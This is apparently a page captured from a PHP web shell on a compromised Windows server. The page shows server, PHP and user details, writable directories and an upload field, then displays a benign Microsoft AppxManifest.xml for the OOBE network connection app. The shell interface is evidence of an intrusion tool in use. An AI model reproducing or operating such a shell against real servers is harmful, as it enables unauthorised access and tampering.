KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT SERVER-PC 10.0 build 26200 (Windows 11) AMD64
User : ServerPC ( 0)
PHP Version : 8.2.12
Disable Function : NONE
Directory :  C:/Windows/SystemApps/Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : C:/Windows/SystemApps/Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy/AppxManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<Package 
    xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10"
    xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10"
    xmlns:rescap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/restrictedcapabilities"
    xmlns:wincap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/windowscapabilities"
    xmlns:mobile="http://schemas.microsoft.com/appx/manifest/mobile/windows10"
    xmlns:mp="http://schemas.microsoft.com/appx/2014/phone/manifest"
    xmlns:uap3="http://schemas.microsoft.com/appx/manifest/uap/windows10/3"
    xmlns:uap5="http://schemas.microsoft.com/appx/manifest/uap/windows10/5"
    xmlns:uap17="http://schemas.microsoft.com/appx/manifest/uap/windows10/17"
    IgnorableNamespaces="uap wincap mobile mp uap3 uap5 uap17">
  <!--
  Manual versioning is used for this app.
  Appx version should be in sync with version used for the app name in OOBENetworkConnectionFlow.AppxSetup.man
  See https://osgwiki.com/wiki/System_Apps#Servicing
  -->
  <Identity Name="Microsoft.Windows.OOBENetworkConnectionFlow" Publisher="CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" Version="10.0.26486.1000" />

  <Properties>
    <DisplayName>ms-resource:AppDisplayName</DisplayName>
    <PublisherDisplayName>ms-resource:PublisherDisplayName</PublisherDisplayName>
    <Logo>Assets\StoreLogo.png</Logo>
    <uap:SupportedUsers>multiple</uap:SupportedUsers>
  </Properties>
    
  <Dependencies>
    <TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.19041.0" MaxVersionTested="12.0.0.0"/>
  </Dependencies>

  <Capabilities>
    <wincap:Capability Name="shellExperience" />
    <wincap:Capability Name="dependencyTarget"/>
    <rescap:Capability Name="deviceManagementAdministrator" />
    <rescap:Capability Name="deviceManagementRegistration" />
    <rescap:Capability Name="cellularDeviceIdentity" />
    <rescap:Capability Name="cellularDeviceControl" />
    <rescap:Capability Name="networkDeviceSettings" />
    <DeviceCapability Name="microphone" />
    <DeviceCapability Name="wiFiControl" />
  </Capabilities>

  <Resources>
    <Resource Language="en-us"/>
  </Resources>
    
  <Applications>
    <Application Id="App" Executable="OOBENetworkConnectionFlow.exe" EntryPoint="OOBENetworkConnectionFlow.App">
      <uap:VisualElements AppListEntry="none" DisplayName="ms-resource:AppDisplayName" Square150x150Logo="Assets\Logo.png" Square44x44Logo="Assets\SmallLogo.png" Description="ms-resource:AppDescription" BackgroundColor="#464646">
        <uap:SplashScreen Image="Assets\SplashScreen.png" uap5:Optional="true"/>
      </uap:VisualElements>
      <Extensions>
        <uap:Extension Category="windows.protocol">
          <uap:Protocol Name="ms-oobenetwork" ReturnResults="optional">
            <uap:DisplayName>ms-resource:AppDisplayName</uap:DisplayName>
          </uap:Protocol>
        </uap:Extension>
        <uap3:Extension Category="windows.appExtension">
          <uap3:AppExtension Name="com.microsoft.windows.extensionpackage" Id="OOBENetworkConnectionFlowExtensions" DisplayName="Extension Metadata">
            <uap3:Properties>
              <PackageAliases>
                <PackageAlias>OOBENetworkConnectionFlowExtensionsAlias</PackageAlias>
              </PackageAliases>
            </uap3:Properties>
          </uap3:AppExtension>
        </uap3:Extension>
        <uap3:Extension Category="windows.appExtension">
          <uap3:AppExtension Name="com.microsoft.windows.extensions.xaml.webexperiencehost" Id="OOBENetworkConnectionFlowExtensions" DisplayName="Microsoft Windows Extensions">
            <uap3:Properties>
              <Classes>
                <WindowsUdk.System.UserProfile.UserOnboardingExtensionFactory>OOBENetworkConnectionFlowExtensions.NetworkConnectionControlExtensionFactory</WindowsUdk.System.UserProfile.UserOnboardingExtensionFactory>
              </Classes>
              <MetadataProviders>
                <Provider>OOBENetworkConnectionFlowExtensions.oobenetworkconnectionflowextensions_XamlTypeInfo.XamlMetaDataProvider</Provider>
                <Provider>NetworkUX.networkux_XamlTypeInfo.XamlMetaDataProvider</Provider>
                <Provider>QuickActions.quickactions_XamlTypeInfo.XamlMetaDataProvider</Provider>
              </MetadataProviders>
            </uap3:Properties>
          </uap3:AppExtension>
        </uap3:Extension>
      </Extensions>
    </Application>
  </Applications>

  <Extensions>
    <Extension Category="windows.activatableClass.inProcessServer">
      <InProcessServer>
        <Path>OOBENetworkConnectionFlowExtensions.dll</Path>
        <ActivatableClass ActivatableClassId="OOBENetworkConnectionFlowExtensions.oobenetworkconnectionflowextensions_XamlTypeInfo.XamlMetaDataProvider" ThreadingModel="both" />
        <ActivatableClass ActivatableClassId="OOBENetworkConnectionFlowExtensions.NetworkConnectionControlExtensionFactory" ThreadingModel="both" />
      </InProcessServer>
    </Extension>
    <uap17:Extension Category="windows.packageExtension">
      <uap17:PackageExtension Name="com.microsoft.windows.extensionpackage" Id="OOBENetworkConnectionFlowExtensions" DisplayName="Extension Package">
        <uap17:Properties>
          <PackageAliases>
            <PackageAlias>OOBENetworkConnectionFlowExtensionsAlias</PackageAlias>
          </PackageAliases>
        </uap17:Properties>
      </uap17:PackageExtension>
    </uap17:Extension>
  </Extensions>
</Package>

Anon7 - 2021